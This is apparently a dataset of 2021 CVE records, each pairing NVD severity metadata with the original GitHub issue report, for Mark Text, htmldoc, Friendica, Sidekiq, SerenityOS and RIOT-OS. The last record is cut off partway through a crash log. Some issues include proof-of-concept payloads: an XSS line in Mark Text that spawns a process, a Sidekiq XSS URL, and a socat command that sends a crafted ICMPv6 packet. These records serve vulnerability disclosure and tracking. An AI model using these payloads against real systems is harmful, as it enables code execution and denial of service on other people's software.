2021-03-31T02:44:15Z
2021-04-12T01:47:39Z
https://github.com/docsifyjs/docsify/issues/1549
845,704,417
1,549
1,786
CVE-2021-29996
2021-04-05T08:15:12.257
Mark Text through 0.16.3 allows attackers arbitrary command execution. This could lead to Remote Code Execution (RCE) by opening .md files containing a mutation Cross Site Scripting (XSS) payload.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/issues/2548" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/issues/2548" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:marktext:marktext:*:*:*:*:*:*:*:*", "matchCriteriaId": "5F071D01-841F-476E-BAF5-A29F31D88D58", "versionEndExcluding": null, "versionEndIncluding": "0.16.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/marktext/marktext/issues/2548
[ "Exploit", "Third Party Advisory" ]
github.com
[ "marktext", "marktext" ]
### Description Cross Site Scripting (XSS) vulnerability that could result in Remote Code Execution (RCE). CVE-2021-29996 was assigned for this issue. ### Steps to reproduce 1. Create a .md file that contains: ``` ```<style/onload=require('child_process').exec('calc')> ``` **Expected behavior:** Language input for the fenced code block should be sanitized before rendered. **Actual behavior:** HTML stored as language input is not sanitized. Arbitrary javascript code is executed upon rendering. Processes outside of Mark Text could be executed due to nodeIntegration being enabled. **Proof of Concept** ![cve-2021-29996-poc](https://user-images.githubusercontent.com/58673953/113520233-a5bd2400-955f-11eb-93cb-5214f4c4c5fc.gif) ### Versions - Mark Text version: 0.16.3 - Operating system: Windows, Linux, MacOS
XSS vulnerability could result in RCE - CVE-2021-29996
https://api.github.com/repos/marktext/marktext/issues/2548/comments
1
2021-04-04T20:40:31Z
2021-12-16T20:14:06Z
https://github.com/marktext/marktext/issues/2548
849,957,041
2,548
1,787
CVE-2021-20308
2021-04-05T22:15:12.947
Integer overflow in the htmldoc 1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service that is similar to CVE-2017-9181.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946289" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/423" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00000.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00000.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "3C2771A0-9E19-4348-A7EE-53F10C08EABC", "versionEndExcluding": null, "versionEndIncluding": "1.9.11", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/michaelrsweet/htmldoc/issues/423
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hi, I found some integer overflow vulnerability that is similar to [CVE-2017-9181](https://nvd.nist.gov/vuln/detail/CVE-2017-9181) in htmldoc. - os : Debian GNU/Linux bullseye/sid - version : 1.9.11 [htmldoc-poc.zip](https://github.com/michaelrsweet/htmldoc/files/6177464/htmldoc-poc.zip) In htmldoc-poc, there are maliciously crafted gif and html file which crashes htmldoc like below. ``` $ htmldoc --webpage -f out.pdf htmldoc-poc.html PAGES: 2 [1] 17884 segmentation fault htmldoc --webpage -f out.pdf htmldoc-poc.html ``` The vulnerability resides in image_load_gif() function in htmldoc/image.cxx file. In line 1279, the program reads data from given gif file using fread. 1279 fread(buf, 9, 1, fp); Then, it stores value to 'img->width' and 'img->height' in line 1320, and 'img->depth' is determined by whether given image is grayscale. 1320 img->width = (buf[5] << 8) | buf[4]; 1321 img->height = (buf[7] << 8) | buf[6]; 1322 img->depth = gray ? 1 : 3; If load_data is equal to 1 and, 'img->width' and 'img->height' are enough large to cause an integer overflow, the small heap block is allocated in line 1326. It leads to buffer overrun when reads data to this buffer in gif_read_image(). 1323 if (!load_data) 1324 return (0); 1325 1326 img->pixels = (uchar *)malloc((size_t)(img->width * img->height * img->depth));
Bug: buffer-overflow caused by integer-overflow in image_load_gif()
https://api.github.com/repos/michaelrsweet/htmldoc/issues/423/comments
6
2021-03-21T13:11:39Z
2021-04-06T12:29:34Z
https://github.com/michaelrsweet/htmldoc/issues/423
837,074,065
423
1,788
CVE-2021-30141
2021-04-05T23:15:12.190
Module/Settings/UserExport.php in Friendica through 2021.01 allows settings/userexport to be used by anonymous users, as demonstrated by an attempted access to an array offset on a value of type null, and excessive memory consumption. NOTE: the vendor states "the feature still requires a valid authentication cookie even if the route is accessible to non-logged users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/friendica/friendica/issues/10110" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/friendica/friendica/pull/10113/commits/acbcc56754121ba080eac5b6fdf69e64ed7fe453" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/friendica/friendica/issues/10110" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/friendica/friendica/pull/10113/commits/acbcc56754121ba080eac5b6fdf69e64ed7fe453" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:friendica:friendica:*:*:*:*:*:*:*:*", "matchCriteriaId": "AB126001-C368-4484-B88B-6CE423F8A508", "versionEndExcluding": null, "versionEndIncluding": "2021.01", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/friendica/friendica/issues/10110
[ "Exploit", "Third Party Advisory" ]
github.com
[ "friendica", "friendica" ]
- [X] I have searched open and closed issues for duplicates ### Bug Description I saw some weird and suspicious lines in the PHP error log. On the Friendica forum node there are no user accounts I don't own. But still, the errors indicated that someone was trying to export a user account. So I checked if I can access the userexport path in a private browser window. Yep. I can. Well, the export doesn't work because the system doesn't know which user account to export when the visitor is clicking on the link "export account". But this really looks like a dangerous habit to allow the access to that page for unauthenticated visitors. From the PHP log: ``` PHP Notice: Trying to access array offset on value of type null in .../src/Module/Settings/UserExport.php on line 93 PHP Fatal error: Allowed memory size of 218103808 bytes exhausted (tried to allocate 8192 bytes) in .../src/Database/Database.php on line 927 ``` ### Steps to Reproduce 1. open `.../settings/userexport` in a private browser window (unauthenticated access) 2. well, you'll see the problem Actual Result: ![image](https://user-images.githubusercontent.com/3656054/113337242-cef36f80-9327-11eb-98c6-b6d377585e35.png) Expected Result: Access denied error page. ### Platform Info Friendica Version: 2021.03-rc Friendica Source: git PHP version: 7.4 SQL version: MariaDB 10.3
An unauthenticated visitor can access a path like .../settings/userexport
https://api.github.com/repos/friendica/friendica/issues/10110/comments
6
2021-04-01T18:23:33Z
2021-04-06T11:47:34Z
https://github.com/friendica/friendica/issues/10110
848,689,335
10,110
1,789
CVE-2021-30151
2021-04-06T06:15:15.547
Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/mperham/sidekiq/issues/4852" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00011.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/mperham/sidekiq/issues/4852" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00011.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE56AA35-CDD5-41CD-BC84-82DEF18AE786", "versionEndExcluding": null, "versionEndIncluding": "5.1.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*", "matchCriteriaId": "FF48E0F3-8D6A-4F28-869C-2E42A2BF9AE8", "versionEndExcluding": null, "versionEndIncluding": "6.2.0", "versionStartExcluding": null, "versionStartIncluding": "6.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/mperham/sidekiq/issues/4852
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "mperham", "sidekiq" ]
Hi there, I found an XSS vulnerability affecting version **v5.1.3** and maybe anything below that. ## PoC ```[HOST]/sidekiq/queues/"onmouseover="alert('@xhzeem')"```
[sidekiq <= v6.2, v5.1.3] Cross-site-scripting (XSS)
https://api.github.com/repos/sidekiq/sidekiq/issues/4852/comments
8
2021-03-24T21:56:32Z
2021-04-07T07:40:52Z
https://github.com/sidekiq/sidekiq/issues/4852
840,200,765
4,852
1,790
CVE-2021-27343
2021-04-06T13:15:14.200
SerenityOS Unspecified is affected by: Buffer Overflow. The impact is: obtain sensitive information (context-dependent). The component is: /Userland/Libraries/LibCrypto/ASN1/DER.h Crypto::der_decode_sequence() function. The attack vector is: Parsing RSA Key ASN.1.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/commit/48fbf6a88d4822a1e5470cf08f29464511bd72c1" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/5317" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5344" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/commit/48fbf6a88d4822a1e5470cf08f29464511bd72c1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/5317" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5344" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:serenityos:serenityos:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0A631C0-3E3F-4FC9-8E7D-8843F0133B9C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/SerenityOS/serenity/issues/5317
[ "Third Party Advisory" ]
github.com
[ "SerenityOS", "serenity" ]
Found with FuzzRSAKeyParsing. File: [crash-f944dcd635f9801f7ac90a407fbc479964dec024.txt](https://github.com/SerenityOS/serenity/files/5975197/crash-f944dcd635f9801f7ac90a407fbc479964dec024.txt) (with txt extension to allow uploading to GH) Trace: ``` ==157609==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000008d92 at pc 0x00000056a24e bp 0x7fffa1e21750 sp 0x7fffa1e21748 READ of size 1 at 0x602000008d92 thread T0 #0 0x56a24d in Crypto::der_decode_sequence(unsigned char const*, unsigned long, Crypto::ASN1::List*, unsigned long, bool) /home/lukew/Desktop/serenity-project/serenity/build/../Userland/Libraries/LibCrypto/ASN1/DER.h:345:18 #1 0x566ba4 in Crypto::PK::RSA::parse_rsa_key(AK::Span<unsigned char const>) /home/lukew/Desktop/serenity-project/serenity/build/../Userland/Libraries/LibCrypto/PK/RSA.cpp:57:9 #2 0x5623de in LLVMFuzzerTestOneInput /home/lukew/Desktop/serenity-project/serenity/build/../Meta/Lagom/Fuzzers/FuzzRSA.cpp:34:5 #3 0x46a6d1 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x46a6d1) #4 0x469e15 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x469e15) #5 0x46c0b7 in fuzzer::Fuzzer::MutateAndTestOne() (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x46c0b7) #6 0x46cdb5 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x46cdb5) #7 0x45b76e in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x45b76e) #8 0x4845b2 in main (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x4845b2) #9 0x7f3d406a70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #10 0x43050d in _start (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x43050d) 0x602000008d92 is located 0 bytes to the right of 2-byte region [0x602000008d90,0x602000008d92) allocated by thread T0 here: #0 0x53023d in malloc (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x53023d) #1 0x563c74 in AK::ByteBufferImpl::ByteBufferImpl(void const*, unsigned long) /home/lukew/Desktop/serenity-project/serenity/build/.././AK/ByteBuffer.h:274:35 #2 0x56383c in AK::ByteBufferImpl::copy(void const*, unsigned long) /home/lukew/Desktop/serenity-project/serenity/build/.././AK/ByteBuffer.h:313:25 #3 0x5625c4 in AK::ByteBuffer::copy(void const*, unsigned long) /home/lukew/Desktop/serenity-project/serenity/build/.././AK/ByteBuffer.h:126:79 #4 0x5623bd in LLVMFuzzerTestOneInput /home/lukew/Desktop/serenity-project/serenity/build/../Meta/Lagom/Fuzzers/FuzzRSA.cpp:33:27 #5 0x46a6d1 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x46a6d1) #6 0x469e15 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool*) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x469e15) #7 0x46c0b7 in fuzzer::Fuzzer::MutateAndTestOne() (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x46c0b7) #8 0x46cdb5 in fuzzer::Fuzzer::Loop(std::__Fuzzer::vector<fuzzer::SizedFile, fuzzer::fuzzer_allocator<fuzzer::SizedFile> >&) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x46cdb5) #9 0x45b76e in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x45b76e) #10 0x4845b2 in main (/home/lukew/Desktop/serenity-project/serenity/build/Meta/Lagom/Fuzzers/FuzzRSA+0x4845b2) #11 0x7f3d406a70b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lukew/Desktop/serenity-project/serenity/build/../Userland/Libraries/LibCrypto/ASN1/DER.h:345:18 in Crypto::der_decode_sequence(unsigned char const*, unsigned long, Crypto::ASN1::List*, unsigned long, bool) Shadow bytes around the buggy address: 0x0c047fff9160: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff9170: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff9180: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff9190: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff91a0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 02 fa =>0x0c047fff91b0: fa fa[02]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff91c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff91d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff91e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff91f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==157609==ABORTING ```
LibCrypto: Read buffer overflow in Crypto::der_decode_sequence
https://api.github.com/repos/SerenityOS/serenity/issues/5317/comments
1
2021-02-13T05:10:17Z
2021-02-14T12:30:10Z
https://github.com/SerenityOS/serenity/issues/5317
807,678,846
5,317
1,791
CVE-2021-27357
2021-04-06T13:15:14.277
RIOT-OS 2020.01 contains a buffer overflow vulnerability in /sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16018" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16018" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:riot-os:riot:2021.01:*:*:*:*:*:*:*", "matchCriteriaId": "8F041205-8394-4EA3-BC9A-CFA9690634F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/RIOT-OS/RIOT/issues/16018
[ "Third Party Advisory" ]
github.com
[ "RIOT-OS", "RIOT" ]
#### Description RIOT's RPL implementation as provided by the `gnrc_rpl` module lacks proper bounds checks. RPL messages are encapsulated in ICMPv6 datagrams. The message body of the ICMPv6 datagram is extracted as follows: https://github.com/RIOT-OS/RIOT/blob/7ed50c3d18492ba4875b6adf3b7f51b48e4a7f21/sys/net/gnrc/routing/rpl/gnrc_rpl.c#L175-L196 The code above casts `icmpv6_hdr + 1` (i.e. the ICMPv6 message body) to the appropriate RPL packed struct (e.g. `gnrc_rpl_dio_t`). However, it does not check whether the message is large enough to even contain a `gnrc_rpl_dio_t` (or any other packed RPL struct). As such, the handlers in `gnrc_rpl_control_messages.c` for specific RPL messages must check the `len` parameter before accessing any fields of these structs. The handler for `gnrc_rpl_dao_t` messages, for example, directly pass the required information to the `gnrc_rpl_validation_DAO` function, however, this function itself access fields of the struct before performing a length check to ensure that these fields are actually present. For example: https://github.com/RIOT-OS/RIOT/blob/1b35d06a51a8a77c88e489e1571a201a68f8d400/sys/net/gnrc/routing/rpl/gnrc_rpl_control_messages.c#L116-L118 If the ICMP packet is too short this will result in an out-of-bounds read. #### Steps to reproduce the issue Use `examples/gnrc_networking`, activate `gnrc_pktbuf_malloc` and set `CONFIG_GNRC_RPL_DEFAULT_NETIF` to your netif (check with `ifconfig` in the shell provided by `gnrc_networking`) mine is `6`: ```diff diff --git a/examples/gnrc_networking/Makefile b/examples/gnrc_networking/Makefile index bf76931305..15132894c1 100644 --- a/examples/gnrc_networking/Makefile +++ b/examples/gnrc_networking/Makefile @@ -31,6 +31,9 @@ USEMODULE += netstats_l2 USEMODULE += netstats_ipv6 USEMODULE += netstats_rpl +USEMODULE += gnrc_pktbuf_malloc +CFLAGS += -DCONFIG_GNRC_RPL_DEFAULT_NETIF=6 + # Optionally include DNS support. This includes resolution of names at an # upstream DNS server and the handling of RDNSS options in Router Advertisements # to auto-configure that upstream DNS server. ``` Compile and run the application using: ``` $ make -C examples/gnrc_networking all-asan $ make -C examples/gnrc_networking term ``` Afterwards run `socat` as: ``` # printf 'mwKZgn8=' | base64 -d | socat -u STDIN IP6-SENDTO:[<LL address>%tap0]:58 ``` #### Expected results The application shouldn't crash. #### Actual results ``` RIOT network stack example application All up, running the shell now > ==12092==WARNING: ASan is ignoring requested __asan_handle_no_return: stack top: 0xffddc000; 